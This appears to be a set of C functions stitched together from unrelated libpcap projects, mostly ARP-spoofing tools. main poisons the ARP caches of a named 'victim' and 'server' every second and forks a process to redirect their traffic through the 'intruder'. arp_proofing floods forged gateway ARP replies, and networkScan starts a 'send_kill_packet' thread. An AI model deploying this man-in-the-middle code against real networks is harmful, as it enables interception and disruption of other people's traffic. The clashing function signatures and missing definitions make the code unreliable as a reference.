void arp_proofing()
{
char *dev;
char *net;
char *mask;
bpf_u_int32 netp;
bpf_u_int32 maskp;
char errbuf[PCAP_ERRBUF_SIZE];
int ret;
struct pcap_pkthdr hdr;
struct in_addr net_addr, mask_addr;
struct bpf_program fp;
pcap_t *pcd;
dev = pcap_lookupdev(errbuf);
printf("DEV : %s\n", dev);
ret = pcap_lookupnet(dev, &netp, &maskp, errbuf);
net_addr.s_addr = netp;
net = inet_ntoa(net_addr);
printf("NET : %s\n", net);
mask_addr.s_addr = maskp;
mask = inet_ntoa(mask_addr);
printf("MSK : %s\n", mask);
printf("=======================\n");
pcd = pcap_open_live(dev, BUFSIZ, NONPROMISCUOUS, -1, errbuf);
flag = 0;
while (1) {
pcap_loop(pcd, 1, arp, NULL);
if (flag == 1 || flag == 0)
{
for (int i = 0; i <= 5; i++)
{
h_dest[i] = *(sender_mac + i);
}
string_copy(h_source, MY_mac, 6);
string_copy(ar_sha, MY_mac, 6);
for (int i = 0; i <= 3; i++)
{
ar_sip[i] = *(gw_IP + i);
ar_tha[i] = *(sender_mac + i);
}
string_copy((unsigned char*)ar_tip, (unsigned char*)sender_ip, 4);
send_arp_packet(pcd, 2);
send_arp_packet(pcd, 2);
send_arp_packet(pcd, 2);
flag = 0;
}
}
pcap_close(pcd);
}
void having_sender_mac(unsigned char* sender_ip)
{
for (int i = 0; i<6; i++)
{
h_dest[i] = 0xff;
ar_tha[i] = 0x00;
}
string_copy(h_source, MY_mac, 6);
string_copy(ar_sha, MY_mac, 6);
string_copy((unsigned char*)ar_sip, (unsigned char*)MY_IP, 4);
string_copy((unsigned char*)ar_tip, (unsigned char*)sender_ip, 4);
char *dev;
char *net;
char *mask;
const u_char *packet;
bpf_u_int32 netp;
bpf_u_int32 maskp;
char errbuf[PCAP_ERRBUF_SIZE];
int ret;
struct pcap_pkthdr hdr;
struct in_addr net_addr, mask_addr;
struct bpf_program fp;
pcap_t *pcd;
dev = pcap_lookupdev(errbuf);
ret = pcap_lookupnet(dev, &netp, &maskp, errbuf);
net_addr.s_addr = netp;
net = inet_ntoa(net_addr);
mask_addr.s_addr = maskp;
mask = inet_ntoa(mask_addr);
pcd = pcap_open_live(dev, BUFSIZ, NONPROMISCUOUS, -1, errbuf);
send_arp_packet(pcd, 1);
while (flag == 0)
{
pcap_loop(pcd, 1, receive_mac, NULL);
}
pcap_close(pcd);
}
void *
tc_worker_thread(void *t_ctx) {
int rc = 0, i , j ;
struct thread_context *tctx = (struct thread_context *)t_ctx;
rc = pthread_mutex_lock(&create_thread_mutex);
if (rc) {
printf("%s : pthread_mutex_lock failed with rc = %d, errno = %d \n", __FUNCTION__, rc, errno);
pthread_exit(&rc);
}
/* notify main thread to proceed creating other master thread */
rc = pthread_cond_broadcast(&create_thread_cond);
if (rc) {
printf("%s : pthread_cond_broadcast failed with rc = %d, errno = %d \n", __FUNCTION__, rc, errno);
pthread_exit(&rc);
}
/* wait for main thread start notification */
rc = pthread_cond_wait(&start_thread_cond, &create_thread_mutex);
if (rc) {
printf(" %s : pthread_cond_wait failed with rc = %d, errno = %d \n", __FUNCTION__, rc , errno);
pthread_exit(&rc);
}
rc = pthread_mutex_unlock(&create_thread_mutex);
if (rc) {
printf("%s : pthread_mutex_unlock failed with rc = %d, errno = %d \n", __FUNCTION__, rc , errno);
pthread_exit(&rc);
}
/***************************start helper thread****************************************/
/* Intialize helper thread attributes */
pthread_attr_init(&tctx->helper_attrs);
pthread_attr_setdetachstate(&tctx->helper_attrs, PTHREAD_CREATE_JOINABLE);
pthread_attr_setscope(&tctx->helper_attrs, PTHREAD_SCOPE_PROCESS);
pthread_mutex_init(&tctx->helper_mutex, NULL);
pthread_cond_init(&tctx->helper_cond, NULL);
tctx->exit_helper = 0; /* false */
tctx->rcvd_reply = 0;
tctx->num_reply = 0;
rc = pthread_mutex_lock(&tctx->helper_mutex);
if(rc) {
printf("%s : pthread_mutex_lock failed with rc = %d, errno = %d \n", __FUNCTION__, rc , errno);
pthread_exit(&rc);
}
/* create a receive thread to handle all receive */
rc = pthread_create(&tctx->helper, &tctx->helper_attrs, tc_helper_thread, (void *)tctx);
if (rc) {
printf(" %s : pthread_create failed with rc = %d, errno = %d \n", __FUNCTION__, rc , errno);
pthread_exit(&rc);
}
rc = pthread_cond_wait(&tctx->helper_cond, &tctx->helper_mutex);
if(rc) {
pthread_cancel(tctx->helper);
printf(" %s : pthread_cond_wait failed with rc = %d, errno = %d \n", __FUNCTION__, rc , errno);
pthread_exit(&rc);
}
rc = pthread_mutex_unlock(&tctx->helper_mutex);
if(rc) {
pthread_cancel(tctx->helper);
printf(" %s : pthread_mutex_unlock failed with rc = %d, errno = %d \n", __FUNCTION__, rc , errno);
pthread_exit(&rc);
}
for(i = 0; i < NUM_RETRIES; i++) {
for(j = 0; j < tctx->num_devices; j++) {
if(strcmp(tctx->source.name, tctx->dev_list[j].name)) {
rc = send_arp_packet(tctx->source, tctx->dev_list[j], MAX_COUNT);
if(rc) {
printf("Error while sending Arp packet from source %s to dest %s \n", tctx->source.name, tctx->dev_list[j].name);
printf("Continuing .... \n");
}
}
}
if(tctx->rcvd_reply) {
break;
}
}
tctx->exit_helper = 1;
pthread_exit(NULL);
}
void *networkScan(void *arg)
{
bpf_u_int32 netaddr=0, mask=0; /* To Store network address and netmask */
struct bpf_program filter; /* Place to store the BPF filter program */
char errbuf[PCAP_ERRBUF_SIZE]; /* Error buffer */
pcap_t *descr = NULL; /* Network interface handler */
char *ethernet = DEVICENAME;
device_info dev_info; /*my ethernet address*/
device_info gate_info;
NodeStatus node_status; //노드 정보
network_grub_args *n_args = 0;
sendkill_grub_args k_args;
pthread_t t_id1 = 0;
pthread_t t_id2 = 0;
int state1 = 0;
int state2 = 0;
receiver_grub_args grub;
int i;
memset(&node_status, 0, sizeof(NodeStatus));
n_args = (network_grub_args*)arg;
memset(errbuf,0,PCAP_ERRBUF_SIZE);
/* Open network device for packet capture */
if ((descr = pcap_open_live(ethernet, MAXBYTES2CAPTURE, 0, 512, errbuf))==NULL){
fprintf(stderr, "1ERROR: %s\n", errbuf);
exit(1);
}
/* Look up info from the capture device. */
if( pcap_lookupnet(ethernet , &netaddr, &mask, errbuf) == -1){
fprintf(stderr, "2ERROR: %s\n", errbuf);
exit(1);
}
/* Compiles the filter expression into a BPF filter program */
if ( pcap_compile(descr, &filter, "tcp or arp", 1, mask) == -1){
fprintf(stderr, "3ERROR: %s\n", pcap_geterr(descr) );
exit(1);
}
/* Load the filter program into the packet capture device. */
if (pcap_setfilter(descr,&filter) == -1){
fprintf(stderr, "4ERROR: %s\n", pcap_geterr(descr) );
exit(1);
}
get_device_info(&dev_info);
k_args.n_args = n_args;
k_args.gate_info = &gate_info;
k_args.descr = descr;
while(1) { /* get gateway*/
const unsigned char *packet = NULL; //packet
struct pcap_pkthdr *p_pkthdr = 0;
packet = make_arp_packet(dev_info, n_args->g_ip);
pcap_sendpacket(descr, packet, 42);
if (pcap_next_ex(descr, &p_pkthdr, &packet) != 1) {
continue;
}
if(gateway_get(packet, n_args->g_ip, k_args.gate_info))
break;
}
printf("GateWay MAC: ");
for(i=0; i<6;i++) {
printf("%02X:", k_args.gate_info->macaddr[i]);
}
printf("\nGateWay IP: ");
for(i=0; i<4;i++) {
printf("%d.", k_args.gate_info->ipaddr[i]);
}
puts("");
grub.p_descr = descr;
grub.p_node_status = &node_status;
memcpy( (char*)&grub+8, (unsigned char*)&dev_info+6, 4);
state1 = pthread_create(&t_id1, NULL, receiver, &grub);
// puts("thread start");
if (state1 != 0) {
fprintf(stderr, "pthread_create() error\n");
return 0;
}
state2 = pthread_create(&t_id2, NULL, send_kill_packet, &k_args);
// puts("thread start");
if (state2 != 0) {
fprintf(stderr, "pthread_create() error\n");
return 0;
}
// puts("thread start2");
while(1) {
traffic_flag = 0;
memset(&node_status, 0, sizeof(NodeStatus));
send_arp_packet(descr, dev_info);
sleep(1);
printf("network node status!!!!\n");
for(i=1; i<255; i++) {
if(node_status.node[i].status == 1) {
printf("%6d", i);
} else {
printf("%6d", 0);
}
if(i%15 == 0)
puts("");
}
puts("");
traffic_flag = 1;
sleep(30);
}
printf("main function exit\n");
return 0;
}
int main (int argc, char **argv)
{
struct ifreq if_data;
int sockd;
/* IPs & MACs */
unsigned int S_ip[4];
unsigned int S_mac[6];
unsigned int V_ip[5];
unsigned int V_mac[6];
unsigned int I_ip[4];
unsigned int I_mac[6];
u_int32_t local_ip;
if (argc!=3)
{
printf ("%s ip_server ip_victim\n", argv[0]);
exit(EXIT_FAILURE);
}
/* Read params */
sscanf (argv[1], "%d.%d.%d.%d", &S_ip[0], &S_ip[1], &S_ip[2], &S_ip[3]);
sscanf (argv[2], "%d.%d.%d.%d", &V_ip[0], &V_ip[1], &V_ip[2], &V_ip[3]);
/* server's MAC */
sscanf (getmacfromarpcache(argv[1]) ,"%2X:%2X:%2X:%2X:%2X:%2X",
&S_mac[0], &S_mac[1], &S_mac[2], &S_mac[3], &S_mac[4], &S_mac[5]);
/* victim's MAC */
sscanf (getmacfromarpcache(argv[2]) ,"%2X:%2X:%2X:%2X:%2X:%2X",
&V_mac[0], &V_mac[1], &V_mac[2], &V_mac[3], &V_mac[4], &V_mac[5]);
if ((sockd = socket (AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
exit (0);
}
strcpy (if_data.ifr_name, "eth0");
/* Intruder's MAC */
if (ioctl (sockd, SIOCGIFHWADDR, &if_data) < 0)
{
perror ("ioctl(): SIOCGIFHWADDR \n");
exit(EXIT_FAILURE);
}
memcpy (I_mac, if_data.ifr_hwaddr.sa_data, 6);
/* Intruder's IP */
if (ioctl (sockd, SIOCGIFADDR, &if_data) < 0) {
perror ("ioctl(); SIOCGIFADDR \n");
exit(EXIT_FAILURE);
}
memcpy ((void *) &local_ip, (void *) &if_data.ifr_addr.sa_data + 2, 4);
sscanf (inetaddr(local_ip), "%d.%d.%d.%d",
&I_ip[0], &I_ip[1], &I_ip[2], &I_ip[3]);
printf("\n\n %s\t\t%s \n" \
" (S) _____ _____ (V) \n" \
" \\ / \n" \
" \\ / \n" \
" \\ / \n" \
" | \n" \
" (I) \n" \
" %s \n\n\n",
argv[1], argv[2], inetaddr(local_ip) );
int pid = fork();
if (pid < 0)
{
printf ("fork()");
exit(EXIT_FAILURE);
}
if (pid != 0)
{
while (1)
{
/* Tell victim that "Server's IP" has "Intruder's MAC" */
send_arp_packet(I_mac, S_ip, V_mac, V_ip);
/* Tell server that "Victim's IP" has "Intruder's MAC" */
send_arp_packet (I_mac, V_ip, S_mac, S_ip);
sleep(1);
}
}
else
{
redirect_packet(I_mac, S_mac, S_ip, V_mac, V_ip );
}
return 0;
}
